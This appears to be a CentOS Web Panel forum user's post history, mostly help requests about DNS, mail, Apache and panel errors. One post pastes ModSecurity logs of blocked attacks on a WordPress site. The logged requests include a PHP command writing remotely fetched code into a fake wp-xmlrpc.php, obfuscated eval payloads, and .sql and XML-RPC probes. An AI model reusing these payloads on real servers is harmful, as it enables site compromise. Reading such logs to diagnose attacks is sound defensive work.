Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
31
DNS / WEBSITES WITH ns1.centos-webpanel.com AND ns2.centos-webpanel.com WONT WORK
« on: August 19, 2018, 10:41:27 AM »
Some time ago some were complaining that the site dose not open up. So yes, thats now a fact. All sites that are hosted
ns1.centos-webpanel.com
ns2.centos-webpanel.com
do not work. Sites who are on cloudflare work fine.
Reinstalled bind, did not work. Some time ago had similar problems. Any advice, help?
@Sandeep, maybe you can help me on this once again?
NS1: ns1.centos-webpanel.com | IP:127.0.0.1 [Change]
NS2: ns2.centos-webpanel.com | IP:127.0.0.1 [Change]
Server IP: ***.***.***.*** | *******.**
Shared IP: ***.***.***.*** [Change]
Hostname: *******.** [Change]
Your IP: ***.***.***.***
CWPpro version: 0.9.8.535
Mostly I get:
Nameserver ns2.centos-webpanel.com has an IP address (167.114.21.225) without PTR configured.
All nameservers in the delegation have IPv4 addresses in the same AS (16276).
All nameservers in the delegation are in the same AS (16276).
Parent has nameserver(s) not listed at the child (ns3.centos-webpanel.com; ns4.centos-webpanel.com; ns5.centos-webpanel.com).
ns1.centos-webpanel.com
ns2.centos-webpanel.com
do not work. Sites who are on cloudflare work fine.
Reinstalled bind, did not work. Some time ago had similar problems. Any advice, help?
@Sandeep, maybe you can help me on this once again?
NS1: ns1.centos-webpanel.com | IP:127.0.0.1 [Change]
NS2: ns2.centos-webpanel.com | IP:127.0.0.1 [Change]
Server IP: ***.***.***.*** | *******.**
Shared IP: ***.***.***.*** [Change]
Hostname: *******.** [Change]
Your IP: ***.***.***.***
CWPpro version: 0.9.8.535
Mostly I get:
Nameserver ns2.centos-webpanel.com has an IP address (167.114.21.225) without PTR configured.
All nameservers in the delegation have IPv4 addresses in the same AS (16276).
All nameservers in the delegation are in the same AS (16276).
Parent has nameserver(s) not listed at the child (ns3.centos-webpanel.com; ns4.centos-webpanel.com; ns5.centos-webpanel.com).
32
CentOS 6 Problems / 502 Bad Gateway
« on: August 03, 2018, 04:57:13 PM »
Hi,
need help, cant login to cwp panel, not loccaly or from IP, restarted server, no ideas.
locall ip:2030 redirects to 2087
locall ip 2031 Your connection is not secure after certificate approval get 502 Bad Gateway
Running centos 6.10, cwp pro... help???
need help, cant login to cwp panel, not loccaly or from IP, restarted server, no ideas.
locall ip:2030 redirects to 2087
locall ip 2031 Your connection is not secure after certificate approval get 502 Bad Gateway
Running centos 6.10, cwp pro... help???
33
E-Mail / mail is not sending from wordpress
« on: July 24, 2018, 08:16:12 AM »
Hello,
after update I dont get any mails from my sites, registration, login and so on emails.
CWPpro version: 0.9.8.529
Is this ok?
https://imgur.com/a/mR937mO
after update I dont get any mails from my sites, registration, login and so on emails.
CWPpro version: 0.9.8.529
Is this ok?
https://imgur.com/a/mR937mO
34
Installation / Help with Nameserver
« on: February 01, 2018, 11:01:35 AM »
Need help.
So an domain, lets call it, domain.lv is listed on another web hosting provider.
So on my cwp, my side will host the subdomain only - hk.domain.lv
The web hosting server added my IP for hk.domain.lv that host domain.lv
But I think that it has not added my nameservers, I use free or ns1.centos-webpanel.com. and ns2.centos-webpanel.com.
On leafdns site I get:
The parent nameservers do not have your nameservers listed
This means the name does not exist or your registrar is experiencing technical difficulties.
So how to fix this? Do I need to add some records or the hosting provider needs to add my free NS in his records?
Please help. Urgent!
So an domain, lets call it, domain.lv is listed on another web hosting provider.
So on my cwp, my side will host the subdomain only - hk.domain.lv
The web hosting server added my IP for hk.domain.lv that host domain.lv
But I think that it has not added my nameservers, I use free or ns1.centos-webpanel.com. and ns2.centos-webpanel.com.
On leafdns site I get:
The parent nameservers do not have your nameservers listed
This means the name does not exist or your registrar is experiencing technical difficulties.
So how to fix this? Do I need to add some records or the hosting provider needs to add my free NS in his records?
Please help. Urgent!
35
DNS / Free DNS Issue - Could not find reverse address
« on: October 12, 2017, 07:52:05 AM »
I am doing something wrong or that is a problem at your end? 
http://dnscheck.pingdom.com
http://failiem.alksnis.id.lv/public/c387f0
https://zonemaster.iis.se
http://failiem.alksnis.id.lv/public/662bf3
http://dnscheck.pingdom.com
http://failiem.alksnis.id.lv/public/c387f0
https://zonemaster.iis.se
http://failiem.alksnis.id.lv/public/662bf3
36
E-Mail / How to set up Thunderbird to read roundcubes created emails?
« on: September 21, 2017, 08:14:56 AM »
Hello,
1.created an new email in cwp
2.tested it, sent to gmail and got an replayed message back, works, 25 not blocked
3.I use Thunderbird, to manage my emails, gmail, local hosting email providers and so on, but now I would like to add CWP roundcubes mails but how?
Get errors and this one did not help
https://wiki.terranetwork.net/en/email-accounts/thunderbird
Suggestions?
1.created an new email in cwp
2.tested it, sent to gmail and got an replayed message back, works, 25 not blocked
3.I use Thunderbird, to manage my emails, gmail, local hosting email providers and so on, but now I would like to add CWP roundcubes mails but how?
Get errors and this one did not help
https://wiki.terranetwork.net/en/email-accounts/thunderbird
Suggestions?
37
CentOS 6 Problems / Notifications
« on: September 14, 2017, 08:40:05 AM »
Hello,
is there a way to send notification for these cases:
1.email or notification in cwp when an user logs in cwp
2.email or notification when root,users files, example, public_html are updated or changed
3.email or notification of backup task done for root or user
4.any other except these http://wiki.centos-webpanel.com/notifications-in-control-panel
Maybe it is time to make a module - notification bar - were anything similar could be done in a few clicks?
is there a way to send notification for these cases:
1.email or notification in cwp when an user logs in cwp
2.email or notification when root,users files, example, public_html are updated or changed
3.email or notification of backup task done for root or user
4.any other except these http://wiki.centos-webpanel.com/notifications-in-control-panel
Maybe it is time to make a module - notification bar - were anything similar could be done in a few clicks?
38
E-Mail / rDNS/PTR = FAILED, check with your hosting provider!
« on: September 12, 2017, 06:30:22 AM »
Everything was fine, but now it is failed
rDNS/PTR = FAILED, check with your hosting provider!
I have a PTR record set up at ISP
I have a MX record at cloud flare were the domain is set up
Read all the forum about similar issues, but no ideas how to fix this.
Ideas, solutions, fix?
rDNS/PTR = FAILED, check with your hosting provider!
I have a PTR record set up at ISP
I have a MX record at cloud flare were the domain is set up
Read all the forum about similar issues, but no ideas how to fix this.
Ideas, solutions, fix?
39
Updates / After updating today cwp crashes
« on: August 24, 2017, 01:59:29 PM »
Every min or 5 or any 10 sec cwp crashes, no connection.
What I did made an update early morning.
Any other has similar problems? Reloading cwp wont help. Suggestions?
What I did made an update early morning.
Any other has similar problems? Reloading cwp wont help. Suggestions?
40
DNS / CWP DNS or Cloudflare
« on: August 11, 2017, 08:24:24 AM »
Hello,
I am using Cloudflare DNS but was wondering why not use CWP?
Had tried when I started to learn CWP but something was wrong, it did not work.
So my concern is now - which one is better and faster? And read about DNS full remake, is there any updates on it?
I am using Cloudflare DNS but was wondering why not use CWP?
Had tried when I started to learn CWP but something was wrong, it did not work.
So my concern is now - which one is better and faster? And read about DNS full remake, is there any updates on it?
41
CentOS 6 Problems / HELP, Apashe wont start
« on: August 04, 2017, 08:08:18 AM »
Restarted the apache but nothing works, get this
Starting httpd: [Fri Aug 04 11:03:48.840416 2017] [so:warn] [pid 13899:tid 140561375524608] AH01574: module suphp_module is already loaded, skipping
[Fri Aug 04 11:03:48.846935 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Fri Aug 04 11:03:48.846953 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Fri Aug 04 11:03:48.846959 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
(98)Address already in use: AH00072: make_sock: could not bind to address [::]:443
[ OK ]
How to fix it, server restart did not help???
Starting httpd: [Fri Aug 04 11:03:48.840416 2017] [so:warn] [pid 13899:tid 140561375524608] AH01574: module suphp_module is already loaded, skipping
[Fri Aug 04 11:03:48.846935 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Fri Aug 04 11:03:48.846953 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Fri Aug 04 11:03:48.846959 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
(98)Address already in use: AH00072: make_sock: could not bind to address [::]:443
[ OK ]
How to fix it, server restart did not help???
42
Mod_Security / Reloading httpd: not reloading due to configuration syntax error
« on: May 18, 2017, 07:32:58 AM »
Hello,
got this when trying to reload....
When I restart apache it wont start again, red. To start it again I need to unninstall modsecurity.
Using:
CWPpro version: 0.9.8.238
Comodo WAF (Latest version of Comodo WAF rules with automatic updates) [CWPpro required] Installed version: 1.123
Last logs, can some one explain? I got hacked or the mod stopped the hacking?
got this when trying to reload....
When I restart apache it wont start again, red. To start it again I need to unninstall modsecurity.
Using:
CWPpro version: 0.9.8.238
Comodo WAF (Latest version of Comodo WAF rules with automatic updates) [CWPpro required] Installed version: 1.123
Last logs, can some one explain? I got hacked or the mod stopped the hacking?
Code: [Select]
[Fri May 12 19:11:58.407275 2017] [:error] [pid 29061:tid 139971778234112] [client 185.112.248.116:52241] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "file_put_contents" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/23_PHP_PHPGen.conf"] [line "36"] [id "218410"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack: High-Risk PHP Function Name Found||HIDE.lv|F|2"] [data "Matched Data: file_put_contents found within ARGS:cmd: file_put_contents(getcwd().'/wp-xmlrpc.php', rawurldecode(file_get_contents('[url]')));"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXezlDo8LAAAHGFzMAAAAEX"]
[Fri May 12 19:11:58.751947 2017] [:error] [pid 21357:tid 139971809703680] [client 185.112.248.116:52270] [client 185.112.248.116] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXezlDo8LAAAFNtFigAAACU"]
[Fri May 12 19:11:58.753323 2017] [:error] [pid 21357:tid 139971809703680] [client 185.112.248.116:52270] [client 185.112.248.116] ModSecurity: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/13_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||HIDE.lv|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXezlDo8LAAAFNtFigAAACU"]
[Fri May 12 19:11:59.439610 2017] [:error] [pid 21357:tid 139971967051520] [client 185.112.248.116:52292] [client 185.112.248.116] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXez1Do8LAAAFNtFikAAACF"]
[Fri May 12 19:11:59.440990 2017] [:error] [pid 21357:tid 139971967051520] [client 185.112.248.116:52292] [client 185.112.248.116] ModSecurity: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/13_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||HIDE.lv|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXez1Do8LAAAFNtFikAAACF"]
[Fri May 12 19:12:00.061573 2017] [:error] [pid 21301:tid 139971788723968] [client 185.112.248.116:52329] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(base64_decode(\\x22igz1bmn0aw9uihnjyw4ojhbhdggpihsgicagicrmb2xkzxjzid0gyxjyyxkoktsgicagiglmicgkzglyid0gqg9wzw5kaxiojhbhdggpksb7icagicagicagd2hpbgugkgzhbhnlice9psaojgzpbgugpsbyzwfkzglykcrkaxipkskgeyagicagicagicagicakbgzpbgugpsbzdhj0b2xvd2vykcrmawxlktsgicagicagicagicagjhbmawxlid0gjhbhdggglianlycgliakzmlsztsgicagicagicagicagawygkcrmawxlice9iccujyamjiakzmlszsahpsanli4nksb7icagicagicagicagicagicbpziaoaxnfbgluaygkcgzpbgupksb7icagicagicagicagicagicagicagy29udg..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqoAAAAW"]
[Fri May 12 19:12:00.381321 2017] [:error] [pid 21301:tid 139971977541376] [client 185.112.248.116:52359] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(rawurldecode(\\x22%20function%20scan%28%24path%29%20%7b%20%20%20%20%20%24folders%20%3d%20array%28%29%3b%20%20%20%20%20if%20%28%24dir%20%3d%20%40opendir%28%24path%29%29%20%7b%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3d%3d%20%28%24file%20%3d%20readdir%28%24dir%29%29%29%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24lfile%20%3d%20strtolower%28%24file%29%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24pfile%20%3d%20%24path%20.%20%27/%27%20.%20%24file%3b..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqsAAAAE"]
[Fri May 12 19:12:00.990898 2017] [:error] [pid 21301:tid 139971778234112] [client 185.112.248.116:52390] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(base64_decode(\\x22igz1bmn0aw9uihnjyw4ojhbhdggpihsgicagicrmb2xkzxjzid0gyxjyyxkoktsgicagiglmicgkzglyid0gqg9wzw5kaxiojhbhdggpksb7icagicagicagd2hpbgugkgzhbhnlice9psaojgzpbgugpsbyzwfkzglykcrkaxipkskgeyagicagicagicagicakbgzpbgugpsbzdhj0b2xvd2vykcrmawxlktsgicagicagicagicagjhbmawxlid0gjhbhdggglianlycgliakzmlsztsgicagicagicagicagawygkcrmawxlice9iccujyamjiakzmlszsahpsanli4nksb7icagicagicagicagicagicbpziaoaxnfbgluaygkcgzpbgupksb7icagicagicagicagicagicagicagy29udg..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqwAAAAX"]
[Fri May 12 19:12:01.348794 2017] [:error] [pid 21301:tid 139971893622528] [client 185.112.248.116:52426] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(rawurldecode(\\x22%20function%20scan%28%24path%29%20%7b%20%20%20%20%20%24folders%20%3d%20array%28%29%3b%20%20%20%20%20if%20%28%24dir%20%3d%20%40opendir%28%24path%29%29%20%7b%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3d%3d%20%28%24file%20%3d%20readdir%28%24dir%29%29%29%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24lfile%20%3d%20strtolower%28%24file%29%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24pfile%20%3d%20%24path%20.%20%27/%27%20.%20%24file%3b..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0VDo8LAAAFM1gq0AAAAM"]
[Fri May 12 21:29:39.619097 2017] [:error] [pid 21301:tid 139971767744256] [client 172.68.10.236:17343] [client 172.68.10.236] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.lv|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.lv"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRX-E1Do8LAAAFM1gswAAAAY"]
[Sat May 13 02:47:39.994558 2017] [:error] [pid 21329:tid 139971914602240] [client 141.101.104.69:31861] [client 141.101.104.69] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.store|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.store"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRZJm1Do8LAAAFNRZ4gAAABK"]
[Sat May 13 03:11:59.476347 2017] [:error] [pid 21519:tid 139971893622528] [client 172.68.65.136:20127] [client 172.68.65.136] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.113.186.110 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZPT1Do8LAAAFQPCFgAAADM"]
[Sat May 13 03:19:10.869683 2017] [:error] [pid 21301:tid 139972058699520] [client 197.234.242.68:15736] [client 197.234.242.68] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.193.5.44 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZQ-lDo8LAAAFM1g6MAAAAD"]
[Sat May 13 03:28:07.788346 2017] [:error] [pid 21329:tid 139971956561664] [client 162.158.78.134:33282] [client 162.158.78.134] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.209.58.75 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTF1Do8LAAAFNRZ7MAAABG"]
[Sat May 13 03:28:23.621291 2017] [:error] [pid 21519:tid 139971788723968] [client 173.245.50.112:14704] [client 173.245.50.112] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 172.245.60.50 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTJ1Do8LAAAFQPCHIAAADW"]
[Sat May 13 03:28:31.290657 2017] [:error] [pid 21519:tid 139971799213824] [client 141.101.88.158:28616] [client 141.101.88.158] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.251.182.103 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTL1Do8LAAAFQPCHMAAADV"]
[Sat May 13 03:35:00.660806 2017] [:error] [pid 21519:tid 139971778234112] [client 141.101.105.106:34364] [client 141.101.105.106] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.com"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRZUtFDo8LAAAFQPCHcAAADX"]
[Sat May 13 03:39:07.182053 2017] [:error] [pid 21329:tid 139971967051520] [client 141.101.84.170:12332] [client 141.101.84.170] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.154.155.74 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZVq1Do8LAAAFNRZ7kAAABF"]
[Sat May 13 03:49:00.097854 2017] [:error] [pid 29061:tid 139971820193536] [client 108.162.241.164:36239] [client 108.162.241.164] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 108.162.241.164 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZX-FDo8LAAAHGFzdoAAAET"]
[Sat May 13 03:57:56.392645 2017] [:error] [pid 21329:tid 139971788723968] [client 172.68.65.172:24358] [client 172.68.65.172] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 172.68.65.172 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZaFFDo8LAAAFNRZ78AAABW"]
43
CentOS 6 Problems / File Lock
« on: May 15, 2017, 01:57:41 PM »
Hello,
is there an manual or some info about File Lock?
Will backups work when it is turned on?
Can admin turn it off? There is a option in user section, but at admins?
Thanks
is there an manual or some info about File Lock?
Will backups work when it is turned on?
Can admin turn it off? There is a option in user section, but at admins?
Thanks
44
CentOS 6 Problems / PHP7 apcu extension
« on: April 25, 2017, 06:15:27 AM »
Hello,
installed a fresh pydio 7 and get an error
Parameter 1 to pydio\Cache\Core\CoreCacheLoader::loadNodeInfoFromCache() expected to be a reference, value given
Link to post
https://pydio.com/forum/f/topic/parameter-1-to-pydiocachecorecorecacheloader/
So read about that and maybe the solution is apcu extension.
So was wondering how to install it on cwp and will it work together?
Any ideas, solutions, how to fix this?
Thanks
installed a fresh pydio 7 and get an error
Parameter 1 to pydio\Cache\Core\CoreCacheLoader::loadNodeInfoFromCache() expected to be a reference, value given
Link to post
https://pydio.com/forum/f/topic/parameter-1-to-pydiocachecorecorecacheloader/
So read about that and maybe the solution is apcu extension.
So was wondering how to install it on cwp and will it work together?
Any ideas, solutions, how to fix this?
Thanks
